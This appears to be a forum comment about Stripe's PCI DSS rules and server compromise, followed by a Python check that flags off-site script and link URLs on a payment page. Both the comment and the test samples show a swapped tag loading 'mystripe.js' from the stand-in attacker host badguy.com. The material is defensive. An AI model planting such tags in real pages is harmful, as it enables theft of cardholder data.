This can be modified by a criminal on the merchant server to go to <script src='//badguy.com/mystripe.js'>
And then the merchant won't be following one of Stripe's two basic rules for staying PCI DSS compliant any more, will they?
That aside, of course you want to keep your server secure. But if you can't, as a matter of practical security and protecting cardholders in the real world, how would it be any better to have your site intended to transfer entirely to a payment service on their own domain rather than just loading JS from that domain? An attacker who has compromised the security of the files on a merchant's server can change an <a href='...'> that should transfer to the payment service so it goes to a hostile site just as easily as they can change a <script src='...'> that should load JS from a payment service so it loads JS from a hostile site.
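An added example, not part of the original comments: a monitoring check that treats a swapped `<script src>` and a swapped `<a href>` as the same class of tampering, in line with the comparison made above. The host `pay.example.com`, the sample pages and the function names are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the payment service's host; anything else off-site is unexpected.
ALLOWED_HOSTS = {"pay.example.com"}

# Tag/attribute pairs that load code from, or send the customer to, a URL.
URL_ATTRS = {("script", "src"), ("a", "href"), ("form", "action"), ("iframe", "src")}


class OffsiteRefs(HTMLParser):
    """Collect off-site URLs in script, link, form and iframe tags."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if (tag, name) not in URL_ATTRS or not value:
                continue
            host = urlparse(value.strip()).hostname  # None for relative URLs
            if host and host not in ALLOWED_HOSTS:
                self.findings.append((tag, name, value))


def audit(html):
    """Return (tag, attribute, url) for each reference to a non-allowlisted host."""
    parser = OffsiteRefs()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample pages, not taken from any real site.
CLEAN = """<script src='https://pay.example.com/v1.js'></script>
<a href='https://pay.example.com/checkout'>Pay now</a>
<a href='/cart'>Back to cart</a>"""

TAMPERED_SCRIPT = CLEAN.replace("https://pay.example.com/v1.js", "//badguy.com/mystripe.js")
TAMPERED_LINK = CLEAN.replace("https://pay.example.com/checkout", "https://badguy.com/checkout")

if __name__ == "__main__":
    for label, page in [("clean", CLEAN), ("script", TAMPERED_SCRIPT), ("link", TAMPERED_LINK)]:
        print(label, audit(page))
```

Run a check like this from a separate machine against the page as served, since someone who can edit files on the merchant server can also edit a check that lives there.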